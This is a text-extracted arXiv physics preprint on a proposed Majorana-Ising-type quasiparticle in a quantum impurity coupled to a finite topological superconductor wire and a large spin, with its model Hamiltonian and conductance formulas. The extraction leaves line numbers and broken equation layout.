 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ Fractionalization of Majorana-Ising-type quasiparticles
2
+ J.E. Sanches,1, ∗ L.T. Lustosa,1 L.S. Ricco,2 I.A. Shelykh,2, 3 M. de Souza,4 M.S. Figueira,5 and A.C. Seridonio1, †
3
+ 1S˜ao Paulo State University (Unesp), School of Engineering,
4
+ Department of Physics and Chemistry, 15385-000, Ilha Solteira-SP, Brazil
5
+ 2Science Institute, University of Iceland, Dunhagi-3, IS-107, Reykjavik, Iceland
6
+ 3ITMO University, St.
7
+ Petersburg, 197101, Russia
8
+ 4S˜ao Paulo State University (Unesp), IGCE, Department of Physics, 13506-970, Rio Claro-SP, Brazil
9
+ 5Instituto de F´ısica, Universidade Federal Fluminense, 24210-340, Niter´oi, Rio de Janeiro, Brazil
10
+ We theoretically investigate the spectral properties of a quantum impurity (QI) hosting the here
11
+ proposed Majorana-Ising-type quasiparticle (MIQ). It arises from the coupling between a finite topo-
12
+ logical superconducor (TSC) based on a chain of magnetic adatoms-superconducting hybrid system
13
+ and an integer large spin S flanking the QI. Noteworthy, the spin S couples to the QI via the Ising-
14
+ type exchange interaction. As the TSC chain contains overlapped Majorana zero-modes (MZMs)
15
+ at the edges, we counterintuitively find a regime wherein the Ising term modulates the isolation
16
+ of a fractionalized and resonant MZM at the QI site. Interestingly enough, the fermionic nature
17
+ of this state is revealed as purely of electron tunneling-type and most astonishingly, it completely
18
+ ignores the Andreev reflection process in its birth. We find that an isolated edge state appears as a
19
+ zero-mode in a finite TSC and hope that it could be used in majorana-based quantum computing.
20
+ I.
21
+ INTRODUCTION
22
+ Majorana fermions are peculiar particles equal to their
23
+ own antiparticles described by real solutions of the Dirac
24
+ equation[1]. In Condensed Matter Physics, such fermions
25
+ rise as quasiparticle excitations usually quoted as Majo-
26
+ rana zero-modes (MZMs), which are found attached to
27
+ the boundaries of topological superconductors (TSCs)[2–
28
+ 31]. Astonishingly, since the theoretical Kitaev seminal
29
+ proposal of p-wave superconductivity[32], MZMs are no-
30
+ tably coveted due to their attribution as building-blocks
31
+ for the highly pursued fault-tolerant topological quantum
32
+ computing. Thereafter, in the last years, such excitations
33
+ have received astounding focus from both communities
34
+ working with quantum science and technology.
35
+ Interestingly enough, theoretical predictions ensure
36
+ that the fractional zero-bias peak (ZBP) given by the con-
37
+ ductance GTotal(0) = e2
38
+ 2h in transport evaluations through
39
+ quantum dots[2–4], if robust against perturbations, could
40
+ be regarded as the capital hallmark of an isolated MZM
41
+ at the edge of a TSC[3, 4]. Once an ordinary fermion
42
+ can be decomposed into two MZMs, the amplitude 1/2
43
+ in GTotal(0) fractionalizes the quantum of conductance
44
+ e2
45
+ h and represents the electronic zero-frequency spectral
46
+ weight, which reveals indeed, the MZM “half-fermionic”
47
+ nature. This aforementioned fingerprint is expected to
48
+ show up in engineered platforms that combine conven-
49
+ tional s-wave superconductivity and spin-texture [see
50
+ Refs.[33–35] and Fig.1(a)]. As aftermath, the p-wave su-
51
+ perconductivity becomes feasible, thus allowing the ex-
52
+ perimental realization of the spinless Kitaev wire, which
53
+ is indeed, a TSC in 1D[7, 25, 27, 32, 36–39]. For such
54
+ an accomplishment, we highlight two practical recipes,
55
+ ∗ corresponding author: jose.sanches@unesp.br
56
+ † corresponding author: antonio.seridonio@unesp.br
57
+ which have the following ingredients: (i) a semiconduct-
58
+ ing nanowire, with strong spin-orbit coupling (SOC) and
59
+ under a magnetic field, should be deposited on top of
60
+ an s-wave superconductor[25, 29–31, 36, 37, 40] or (ii)
61
+ a linear chain of magnetic adatoms with exchange inter-
62
+ actions should be hosted by an s-wave superconductor
63
+ with strong SOC[13, 18, 33–35, 41–46]. In both the situ-
64
+ ations, the s-wave superconductors with singlet Cooper
65
+ pairing lead to the so-called superconducting proximity
66
+ effect, which is pivotal to carry forward the supercon-
67
+ ducting (SC) character into such manufactured Kitaev
68
+ wires. Thus, the Zeeman field from the previous recipes
69
+ (i) and (ii), together with the magnified SOC from such
70
+ quantum materials, establish a synergy that stabilizes the
71
+ system spin-texture.
72
+ Consequently, the triplet Cooper
73
+ pairing for the p-wave superconductivity, as well.
74
+ Particularly in the topological nontrivial regime of such
75
+ setups, these Majorana quasiparticle excitations emerge
76
+ ideally, i.e., as MZMs decoupled from each other and lo-
77
+ calized on the boundaries of the TSC. Due to this decou-
78
+ pling from their environment, MZMs are regarded robust
79
+ against perturbations, once they are topologically pro-
80
+ tected by the SC gap. Thus, MZMs become promising
81
+ candidates for a quantum computing free of the decoher-
82
+ ence phenomenon[47, 48]. However, perfectly far apart
83
+ MZMs are hypothetical objects, since they are reliable
84
+ solely in infinite-size systems and in real experiments, the
85
+ quantum wires are finite. As a result, these end MZMs
86
+ within a finite length overlap with each other and in-
87
+ evitably, a fermionic mode with a finite energy emerges
88
+ instead.
89
+ To overcome the aforementioned challenge, in this
90
+ work, we find as route the fractionalization of ordinary
91
+ MZMs, in particular, those found at a quantum impu-
92
+ rity (QI) site coupled to one edge of a finite TSC in
93
+ 1D. To this end, we should take into account the Ising
94
+ exchange interaction between an integer large spin and
95
+ such a QI. This setup corresponds to Figs.1(a) and (b),
96
+ arXiv:2301.03507v1 [cond-mat.supr-con] 9 Jan 2023
97
+
98
+ 2
99
+ Spin
100
+ polarized
101
+ tip
102
+ Spin-
103
+ texture
104
+ s-wave superconductor
105
+ Fe wire
106
+ Quantum
107
+ Impurity
108
+ a)
109
+ S
110
+ d)
111
+ f
112
+ Δ
113
+ t
114
+ εM
115
+ J(S/2)
116
+ -J(S/2)
117
+ Metallic Surface
118
+ γ1
119
+ γ2
120
+ εM
121
+ c)
122
+ λ1
123
+ γMIQ
124
+ λ1
125
+ γMIQ
126
+ Source
127
+ b)
128
+ J
129
+ Γ
130
+ Γ
131
+ Drain
132
+ Sz
133
+ sz
134
+ Figure 1.
135
+ (a) Proposed device expected to show a Majorana-
136
+ Ising-type quasiparticle (MIQ) γMIQ localized at the quan-
137
+ tum impurity (QI) site. The MIQ leads to a zero-bias con-
138
+ ductance peak GMIQ(0) =
139
+ e2
140
+ 4h due to the QI placed between
141
+ source and drain leads, but the total conductance is still
142
+ GTotal(0) = e2
143
+ 2h. This occurs once a genuine electron tunneling
144
+ process is present and there is a complete lack of local An-
145
+ dreev reflection. It can be performed by considering the QI
146
+ simultaneously coupled to a spin-polarized tip with an integer
147
+ large spin S via an Ising-type exchange interaction J and with
148
+ a hopping term λ1 to a helical spin-texture chain hosted by
149
+ an s-wave superconductor. (b) Side view of panel (a) wherein
150
+ the QI-lead coupling Γ and Ising-type exchange interaction
151
+ J for the spin-polarized tip and QI appear highlighted. (c)
152
+ Pictorial scheme of panel (b), which effectively consists of a
153
+ topological superconductor (TSC), where ϵM represents the
154
+ overlap between the Majorana zero-modes (MZMs) γ1 and
155
+ γ2 at edges, while the QI shows the MIQ γMIQ. The spatial
156
+ distributions of the wave functions for the MZMs and QI are
157
+ also illustrated. The factor 1
158
+ 4 in GMIQ has correspondence to
159
+ the
160
+ 1
161
+ 4 from the volume for the sphere depicted to represent
162
+ the quasiparticle γMIQ, in contrast to the ratio 1
163
+ 2 for the typ-
164
+ ical volume of the MZMs γ1 and γ2. (d) These MZMs mimic
165
+ a delocalized fermionic site f, wherein ϵM plays the role of
166
+ its energy level, while the QI has 2S + 1 levels ranging from
167
+ −J(S/2) to +J(S/2). In this scenario, such quantum dots
168
+ constitute a Kitaev dimer, i.e., with hopping t and pairing △
169
+ of the p-wave Cooper pair split into the QI and f orbitals.
170
+ and it contains the ordinary MZMs γ1 and γ2 placed at
171
+ the edges of a short TSC wire.
172
+ To better understand
173
+ our findings, we propose to view the MZMs as sketched
174
+ in Fig.1(c), where these objects appear symbolized by
175
+ calottes (half-spheres). We clarify that the employment
176
+ of such a pictorial representation for the MZMs aims to
177
+ explain diagrammatically the electron fractionalization
178
+ into them, as well as the MZM fractionalization itself
179
+ here observed.
180
+ These calottes belong to a delocalized
181
+ sphere cut in half, with each part placed at the TSC
182
+ edges. This cartoon is very useful and it has the purpose
183
+ of emulating the nonlocal nature of the fermionic state
184
+ composed by these MZMs, which are found spatially far
185
+ apart.
186
+ To best of our knowledge, the Majorana zero-
187
+ frequency spectral weight, in particular for a QI coupled
188
+ to an infinite TSC, is given by the unity when the leaking
189
+ of the MZM γ1 into a quantum dot occurs[4]. This unity
190
+ corresponds to a calotte, which is a half-electron state
191
+ that contributes to the conductance GMZM(0) =
192
+ e2
193
+ 2h, as
194
+ expected[3, 4]. Particularly for a finite TSC, we define
195
+ as the system sweet spot [see Fig.3 b)-I] a special con-
196
+ figuration, in which a peculiar Ising exchange interaction
197
+ allows us to observe a fractionalized MZM quasiparticle
198
+ γMIQ at the QI, namely, the called by us as Majorana-
199
+ Ising-type quasiparticle (MIQ) [Figs.1(a) and (c)]. This
200
+ quasiparticle can be viewed as the half-calotte within the
201
+ cartoon representation of the QI state [see also Fig.1(c)].
202
+ Such a ratio symbolizes a novel MZM-type excitation in
203
+ the presence of finite TSCs, in which technically speak-
204
+ ing, it is identified by a Majorana zero-frequency spectral
205
+ weight equals to half.
206
+ Equivalently, the same amount
207
+ corresponds to
208
+ 1
209
+ 4 of the entire QI electronic state.
210
+ In
211
+ contrast, it leads to GMIQ(0) = e2
212
+ 4h as it should be. Inter-
213
+ estingly enough, solely in one of the Majorana densities
214
+ of states (DOSs) of the QI, the MIQ becomes evident as a
215
+ resonant mode localized at ω = 0. Counterintuitively, the
216
+ other Majorana DOS of the QI instead of exhibiting a res-
217
+ onant state, reveals a Majorana zero-frequency spectral
218
+ weight with a valley, but presenting the same magnitude
219
+ of the resonant Majorana fermion. In this manner, we
220
+ can safely state that this novel MZM-type quasiparticle,
221
+ i.e., the MIQ, is then found at the QI. In this situation,
222
+ we demonstrate that the emergence of such a quasiparti-
223
+ cle yields a zero-bias local Andreev conductance entirely
224
+ null, with only normal electronic contribution to the total
225
+ conductance.
226
+ II.
227
+ THE MODEL
228
+ The effective system Hamiltonian that corresponds to
229
+ the proposed setup presented in Fig.1(a) can be expressed
230
+ as:
231
+ H =
232
+
233
+ αkσ
234
+ εαkc†
235
+ αkσcαkσ +
236
+
237
+ σ
238
+ εσd†
239
+ σdσ + iεMγ1γ2
240
+ +
241
+
242
+ Γ
243
+ 2πρ0
244
+ �1/2 �
245
+ αkσ
246
+ (c†
247
+ αkσdσ + H.c.) + JszSz
248
+ + λ1(d↑ − d†
249
+ ↑)γ1,
250
+ (1)
251
+ where the operator c†
252
+ αkσ(cαkσ) describes the creation
253
+ (annihilation) of an electron with momentum k, spin-z
254
+ σ = ±1, energy εαk = εk − µα for the metallic lead
255
+ α = [Source, Drain] in terms of the single-particle energy
256
+ εk and chemical potential µα, while d†
257
+ σ(dσ) stands for the
258
+ electrons at the QI site in which εσ represents their en-
259
+ ergy levels per spin. To connect the QI to the metallic
260
+ leads and a large spin S as well, we should consider the
261
+ QI-lead coupling Γ = 2πv2ρ0, which is determined by
262
+ the QI-lead hopping term v and lead DOS ρ0, in parallel
263
+ to the Ising-type exchange interaction J [Fig.1(b)]. This
264
+ Ising Hamiltonian involves the components sz and Sz of
265
+ the QI (s = 1/2) and S, respectively, wherein the latter
266
+
267
+ 3
268
+ could be well-represented, within an experimental frame-
269
+ work, by a spin-polarized tip [Ref.[49] and Figs.1(a)-(b)].
270
+ The emergence of MZMs at the TSC wire edges are ac-
271
+ counted for γ1 and γ2, with εM as the overlap param-
272
+ eter. Finally, λ1 couples the spin-up channel of the QI
273
+ to γ1 [Fig.1(c)]. Additionally, for the sake of simplicity,
274
+ we consider that the spin-down degree is decoupled from
275
+ the TSC and obeys the single impurity Anderson model
276
+ (SIAM)[50]. Thus, we assume that the spin component
277
+ of the QI that couples to the Kitaev wire is σ = +1,which
278
+ is, as can be viewed in Fig.1(a), the same spin direction
279
+ assumed for the edges of the magnetic chain of adatoms.
280
+ This means that the spin-flips of the QI electron injected
281
+ into the TSC and vice-versa are prevented. Therefore,
282
+ the spin-up degree of the QI is the unique to perceive the
283
+ TSC. Different spin-textures on the TSC edge where γ1
284
+ is found[51], which would allow the mixing of the spin
285
+ degrees of freedom, will be addressed elsewhere and do
286
+ not belong to the current analysis. However, even with
287
+ the present assumption, we shall see that both these spin
288
+ components become influenced by S and that the TSC
289
+ mimics an effective quantum dot tunnel and Andreev-
290
+ coupled to the QI [Fig.1(d)].
291
+ To this end, we call the attention that the Majorana
292
+ and Ising terms of Eq.(1) should be conveniently rewrit-
293
+ ten to access the system underlying Physics: (i) the Ising
294
+ term turns straightforwardly into
295
+ JszSz = J
296
+ 2
297
+
298
+
299
+ σmd†
300
+ σdσ|m⟩⟨m|,
301
+ (2)
302
+ due to the standard expansions sz =
303
+ 1
304
+ 2
305
+
306
+ σ σd†
307
+ σdσ and
308
+ Sz = �
309
+ m m|m⟩⟨m| with m = [−S, −S + 1, ..., S − 1, S]
310
+ for the QI and large spin, respectively. This means that
311
+ each spin channel in the QI acquires a multi-level struc-
312
+ ture split into 2S + 1 energies ranging from −J(S/2) to
313
+ +J(S/2). As a matter of fact, the TSC alters this feature
314
+ quite a bit for the channel σ = +1 as we shall see in the
315
+ numerical data; and (ii) it is imperative to evoke that
316
+ the MZMs are made by the electron (f †) and hole (f) of
317
+ a regular Dirac fermion delocalized over the TSC edges,
318
+ which lead to γ1 =
319
+ 1
320
+
321
+ 2(f † + f) and γ2 =
322
+ i
323
+
324
+ 2(f † − f). In
325
+ this picture, εM plays the role of the energy level related
326
+ to the electronic occupation f †f and the QI is indeed
327
+ hybridized with f, as mentioned earlier, via the hopping
328
+ t and the superconducting pairing ∆. In summary, by
329
+ considering the gauge λ1 =
330
+
331
+ 2t and ∆ = t [Fig.1(d)],
332
+ we simply find the Kitaev dimer composed by d↑ and f
333
+ orbitals:
334
+ iεMγ1γ2 + ε↑d†
335
+ ↑d↑ + λ1(d↑ − d†
336
+ ↑)γ1 = εM(f †f − 1
337
+ 2)
338
+ +ε↑d†
339
+ ↑d↑ + (td↑f † + ∆d↑f + H.c.).
340
+ (3)
341
+ Similarly, the spin-up channel of the QI can be also de-
342
+ composed in MZMs[4], which we label by γA and γB,
343
+ i.e.,
344
+ d↑ =
345
+ 1
346
+
347
+ 2(γA + iγB).
348
+ (4)
349
+ Based on Eq.(4), one can compute the Majorana zero-
350
+ frequency spectral weights for γA and γB, respectively.
351
+ These quantities reveal that in the topological nontrivial
352
+ regime (J = 0, ∆ = t and εM = ε↑ = 0)[4, 32] for the Ki-
353
+ taev dimer, that at the QI site, one spectral weight shows
354
+ a unitary amplitude for a resonant zero-mode, while the
355
+ other is completely null at zero-energy. It means that
356
+ an isolated MZM is found at the QI. Analogously, such
357
+ a feature is also observed in f[4, 32]. This results, ac-
358
+ cording to Eq.(3) given by i
359
+
360
+ 2λ1γBγ1, into two isolated
361
+ MZMs spatially placed at d↑ and f, namely, γA and γ2,
362
+ respectively. For the trivial case (εM ̸= 0), the two spec-
363
+ tral weights for γA and γB attain to unity and then, two
364
+ resonant zero-modes emerge at the QI site. Thus, Eq.(4)
365
+ is extremely clarifying, once it points out the possibil-
366
+ ity of having within the QI, in the presence of εM and
367
+ J, the isolation of the here proposed MIQ. Additionally,
368
+ as one can notice, the spin down channel always shows
369
+ the trivial case, due to its decoupling from the TSC. For
370
+ completeness, the MZMs for d↓ we label by γC and γD.
371
+ III.
372
+ QUANTUM TRANSPORT AND GREEN’S
373
+ FUNCTIONS
374
+ In this section, our goal is the analytical evaluation
375
+ of the total conductance through the QI device depicted
376
+ in Figs.1(a)-(b). As a matter of fact, solely the spin-up
377
+ channel contributes to the conductance, once the spin-
378
+ down is energetically inaccessible as previously stated. In
379
+ the case of a grounded TSC, symmetric QI-lead couplings
380
+ (Γ) independent of the bias-voltage eV and µSource =
381
+ −µDrain = eV/2, the crossed Andreev reflection is sup-
382
+ pressed and the conductance can be split into[52]
383
+ GTotal = GET + GLAR,
384
+ (5)
385
+ where ET and LAR stand for the electron tunneling and
386
+ local Andreev reflection processes, respectively, with
387
+ GET(eV) = e2
388
+ 2h[τ ET
389
+ α¯α (eV/2) + τ ET
390
+ α¯α (−eV/2)],
391
+ (6)
392
+ wherein α = Source, ¯α = Drain and vice-versa, together
393
+ with
394
+ GLAR(eV) = e2
395
+ 2h[τ LAR
396
+ αα (eV/2) + τ LAR
397
+ αα (−eV/2)],
398
+ (7)
399
+ in which the transmittances τ ET
400
+ α¯α = (2S+1)Γ2|⟨⟨d↑|d†
401
+ ↑⟩⟩|2
402
+ and
403
+ τ LAR
404
+ αα
405
+ =
406
+ (2S + 1)Γ2|⟨⟨d†
407
+ ↑|d†
408
+ ↑⟩⟩|2
409
+ depend
410
+ on
411
+ the Green’s functions (GFs) of type ⟨⟨Aσ|Bσ⟩⟩
412
+ =
413
+
414
+ m⟨⟨Aσ|m⟩⟨m|Bσ⟩⟩ (details in the Appendix), due to
415
+ the presence of the large spin, in which the thermal aver-
416
+ age ⟨|m⟩⟨m|⟩ =
417
+ 1
418
+ 2S+1 should be taken into account. They
419
+ should be determined via of the standard equation-of-
420
+ motion (EOM) approach[53] summarized as
421
+ ω+⟨⟨Aσ|Bσ⟩⟩ = ⟨[Aσ, Bσ]+⟩ + ⟨⟨[Aσ, H]|Bσ⟩⟩,
422
+ (8)
423
+
424
+ 4
425
+ where ω+ = ω + iη+ and η+ → 0. Additionally, Ref.[52]
426
+ also ensures that the QI normalized DOS obeys the de-
427
+ composition
428
+ DOS(↑) = −ΓIm⟨⟨d↑|d†
429
+ ↑⟩⟩ = τ ET
430
+ α¯α + τ LAR
431
+ αα .
432
+ (9)
433
+ As Eq.(9) is bounded to unity, it describes the electronic
434
+ overall transmittance through the QI decomposed into
435
+ ET and LAR processes. Specially when it attains to its
436
+ maximum value at zero energy, i.e., the DOS(↑)(0) = 1
437
+ value gives the electronic zero-frequency spectral weight.
438
+ In this case, the regular fermionic state of the QI is
439
+ then made equally by the MZMs γA and γB. Equiva-
440
+ lently, it means that the corresponding normalized DOSs
441
+ for such quasiparticles localize Majorana states with the
442
+ same spectral weights and as a result, the QI state is
443
+ fully built by a pair of resonant MZMs. It gives rise to
444
+ the conductance GTotal(0) = e2
445
+ h . Interestingly enough for
446
+ DOS(↑)(0) = 1/2, an isolated ordinary MZM is found at
447
+ the QI site and the zero-bias conductance is characterized
448
+ by the hallmark GTotal(0) = e2
449
+ 2h[3, 4]. Such a case corre-
450
+ sponds to an ideal infinite superconducting wire. How-
451
+ ever, as we shall see, there is a regime in which the value
452
+ DOS(↑)(0) = 1/2 is still present for a finite wire and due
453
+ to the Ising interaction between the large spin and the
454
+ QI, the observation of the conductance GTotal(0) =
455
+ e2
456
+ 2h
457
+ is ensured. This emerges from the novel excitation that
458
+ we introduce as the MIQ, in particular, by driving the
459
+ system into the sweet spot for the exchange interaction
460
+ J, namely, J = Jh. In the latter, the index “h” stands for
461
+ the “half-fermion” special condition of a MZM, which is
462
+ produced by imposing DOS(↑)(0) = 1/2, from where we
463
+ extract Jh for a given S[see Fig.3 b)-I].
464
+ Therefore,
465
+ in order to reveal the aforementioned
466
+ Physics about the system conductance, we should be-
467
+ gin evaluating Eq.(6) for the electron tunneling process.
468
+ Thus, the GF ⟨⟨d↑|d†
469
+ ↑⟩⟩ should be found via the EOM
470
+ method, which gives
471
+ ⟨⟨d↑|d†
472
+ ↑⟩⟩ =
473
+ 1
474
+ 2S + 1
475
+
476
+ m
477
+ 1
478
+ ω+ − ε↑ − Jm
479
+ 2 + iΓ − Σ+m
480
+ MFs
481
+ ,
482
+ (10)
483
+ where Σ+m
484
+ MFs = K+ + (2t∆)2KMFs ˜Km represents the self-
485
+ energy correction due to the couplings of the QI with
486
+ the TSC and the large spin S. This also depends on the
487
+ following defined quantities
488
+ KMFs =
489
+ ω+
490
+ ω2 − ε2
491
+ M + 2iωη+ − (η+)2 ,
492
+ (11)
493
+ K± = ω+(∆2 + t2) ± εM(t2 − ∆2)
494
+ ω2 − ε2
495
+ M + 2iωη+ − (η+)2
496
+ (12)
497
+ and
498
+ ˜Km =
499
+ KMFs
500
+ ω+ + ε↑ + Jm
501
+ 2 + iΓ − K−
502
+ .
503
+ (13)
504
+ Concerning the LAR, the conductance of Eq.(7) needs
505
+ the evaluation of the anomalous GF ⟨⟨d†
506
+ ↑|d†
507
+ ↑⟩⟩ instead.
508
+ After performing the EOM approach, it gives rise to
509
+ ⟨⟨d†
510
+ ↑|d†
511
+ ↑⟩⟩ = −
512
+ 1
513
+ 2S + 1
514
+
515
+ m
516
+ 2t∆Km
517
+ ω+ + ε↑ + Jm
518
+ 2 + iΓ − Σ−m
519
+ MFs
520
+ ,
521
+ (14)
522
+ with Σ−m
523
+ MF s = K− + (2t∆)2KMF sKm and
524
+ Km =
525
+ KMFs
526
+ ω+ − ε↑ − Jm
527
+ 2 + iΓ − K+
528
+ .
529
+ (15)
530
+ However, if we want to know about the possibility of
531
+ isolating MZMs in the QI, the DOSs for γA and γB should
532
+ be found in order to examine the emergence of resonant
533
+ states.
534
+ To this end, we invert Eq.(4) for γA and γB,
535
+ namely, γA = (d†
536
+ ↑ +d↑)/
537
+
538
+ 2 and γB = i(d†
539
+ ↑ −d↑)/
540
+
541
+ 2, and
542
+ later on we calculate the GFs ⟨⟨γA|γA⟩⟩ and ⟨⟨γB|γB⟩⟩.
543
+ Consequently,
544
+ ⟨⟨γj|γj⟩⟩ = 1
545
+ 2[⟨⟨d↑|d†
546
+ ↑⟩⟩ + ⟨⟨d†
547
+ ↑|d↑⟩⟩
548
+ + ϵ(⟨⟨d†
549
+ ↑|d†
550
+ ↑⟩⟩ + ��⟨d↑|d↑⟩⟩)],
551
+ (16)
552
+ where j = (A, B) corresponds to ϵ = (+1, −1), re-
553
+ spectively.
554
+ Physically speaking, the sign reversal in
555
+ ϵ can lead to distinct quantum interference phenom-
556
+ ena, in particular between those encoded by the nor-
557
+ mal GFs (⟨⟨d↑|d†
558
+ ↑⟩⟩ and ⟨⟨d†
559
+ ↑|d↑⟩⟩) and the correspond-
560
+ ing superconducting (⟨⟨d†
561
+ ↑|d†
562
+ ↑⟩⟩ and ⟨⟨d↑|d↑⟩⟩).
563
+ To re-
564
+ veal such interference processes, we need just to find the
565
+ GFs ⟨⟨d†
566
+ ↑|d↑⟩⟩ and ⟨⟨d↑|d↑⟩⟩ to close the evaluation of
567
+ ⟨⟨γA|γA⟩⟩ and ⟨⟨γB|γB⟩⟩. By applying the EOM method,
568
+ we conclude that
569
+ ⟨⟨d†
570
+ ↑|d↑⟩⟩ =
571
+ 1
572
+ 2S + 1
573
+
574
+ m
575
+ 1
576
+ ω+ + ε↑ + Jm
577
+ 2 + iΓ − Σ−m
578
+ MFs
579
+ (17)
580
+ and
581
+ ⟨⟨d↑|d↑⟩⟩ = −
582
+ 1
583
+ 2S + 1
584
+
585
+ m
586
+ 2∆t ˜Km
587
+ ω+ − ε↑ − Jm
588
+ 2 + iΓ − Σ+m
589
+ MFs
590
+ .
591
+ (18)
592
+ Naturally, we define the normalized DOSs for γA and γB
593
+ such as
594
+ DOS(↑)[γj] = −ΓIm⟨⟨γj|γj⟩⟩.
595
+ (19)
596
+ This formula elucidates that when the quantity DOS(↑
597
+ )[γj](0) = −ΓIm⟨⟨γj|γj⟩⟩(0) = 1 is fulfilled, it can be rec-
598
+ ognized as the maximum Majorana quasiparticle trans-
599
+ mittance or its corresponding zero-frequency spectral
600
+ weight.
601
+ Henceforward, we focus the attention on the case ε↑ =
602
+ 0 (grounded SC). We perceive by inspecting Eqs.(10) and
603
+
604
+ 5
605
+ (17), that Eq.(9) becomes also DOS(↑) = −ΓIm⟨⟨d†
606
+ ↑|d↑⟩⟩.
607
+ Additionally, −ΓIm⟨⟨d†
608
+ ↑|d†
609
+ ↑⟩⟩ = −ΓIm⟨⟨d↑|d↑⟩⟩. This in
610
+ combination with Eqs.(16) and (19) allow us to establish
611
+ that
612
+ DOS(↑) = 1
613
+ 2(DOS(↑)[γA] + DOS(↑)[γB]).
614
+ (20)
615
+ Consequently, by taking into account this finding to-
616
+ gether with Eqs.(5), (6), (7) and (9), we conclude the
617
+ providential equality as follows
618
+ GTotal = GγA + GγB,
619
+ (21)
620
+ where
621
+ Gγj(eV) = e2
622
+ 4h[DOS(↑)[γj](eV/2) + DOS(↑)[γj](−eV/2)]
623
+ (22)
624
+ stands for the conductance contribution arising from the
625
+ quasiparticle γj within the QI.
626
+ We highlight that Eq.(21) introduces an alternative
627
+ perspective concerning the underlying Physics of the con-
628
+ ductance in Eq.(5): the ET and LAR quantum trans-
629
+ port mechanisms are revealed as the net effect of two
630
+ Majorana quasiparticle conductances, namely, the corre-
631
+ sponding contributions arising from γA and γB, respec-
632
+ tively. In this context, we shall see that our main find-
633
+ ings hold for the constraint J = Jh fulfilled, thus char-
634
+ acterizing the system sweet spot to produce the MIQ.
635
+ This regime consists of the maximum Majorana quasi-
636
+ particle transmittance DOS(↑)[γj](0) = 1, surprisingly,
637
+ fractionalized and split into DOS(↑)[γA](0) = 1/2 and
638
+ DOS(↑)[γB](0) = 1/2. Despite such equipartition, the
639
+ electronic transmittance is still given by DOS(↑)(0) =
640
+ 1/2 [see Fig.3 b)-I] and according to Eq.(22), it ensures
641
+ GγA(0) =
642
+ e2
643
+ 4h and GγB(0) =
644
+ e2
645
+ 4h. However, counterintu-
646
+ itively, as we shall see, solely GγB(0) contains a MZM in
647
+ the common sense, i.e., a resonant state, while GγA(0)
648
+ shows a dip instead, but with the same magnitude of
649
+ the peak in γB. This is the reason why we call the con-
650
+ tribution GγB(0) =
651
+ e2
652
+ 4h by GMIQ(0), in attention to the
653
+ emergent MIQ. This is the unique MZM-type resonant
654
+ state that appears in the system, due to the interplay
655
+ between the topological superconductivity and the Ising
656
+ Hamiltonian. In this case, Eqs.(5) and (21) ensure that
657
+ when the MIQ emerges, GγB(0) exhibits a maximum and
658
+ GγA(0) shows a minimum, in such a way that only GET(0)
659
+ enters into GTotal(0) = e2
660
+ 2h. It means that the LAR pro-
661
+ cess is found entirely suppressed within this regime. The
662
+ complete analysis here summarized will be discussed in
663
+ detail later on.
664
+ IV.
665
+ RESULTS
666
+ In the entire numerical analysis we keep constant ε↑ =
667
+ 0 (grounded SC), λ1 = 2.12Γ and perform variations in
668
+ the parameters εM, S and J. In Fig.2 we present, for the
669
+ QI of Fig.1, the total conductance of Eq.(5) as a func-
670
+ tion of the bias-voltage eV/Γ. Particularly in Fig.2(a) the
671
+ ideal case is considered, i.e., the TSC wire is perfectly in-
672
+ finite (εM = 0) and the large spin is found turned-off
673
+ (S = 0). This case is well-known, being characterized by
674
+ the ZBP in the conductance given by GTotal(0) = e2
675
+ 2h[3, 4].
676
+ Interestingly enough, this ZBP in the conductance rep-
677
+ resents the isolated MZM γ1 originally attached to one
678
+ edge of the TSC wire, which leaks towards the QI site
679
+ in the form of the MZM γA. The MZM leakage from
680
+ the TSC edge into the QI is then characterized by the
681
+ DOS(↑)[γA](0) = 1 and DOS(↑)[γB](0) = 0. We will pro-
682
+ vide, later on, extra details concerning this issue in the
683
+ discussion of the inset a)-I of Fig.3(a). In the other hand,
684
+ the satellite peaks in Fig.2(a) are the aftermath of the
685
+ splitting arising from the condition i
686
+
687
+ 2λ1γBγ1 given by
688
+ Eq.(3) for the topological nontrivial regime of the system.
689
+ Additionally, we have made explicit via Eq.(5) that the
690
+ ET and LAR processes compose the total conductance.
691
+ Thus, such a feature can be viewed in Fig.2(b), where
692
+ we notice, in particular, for the ZBP conductance that,
693
+ the ET and LAR split equally.
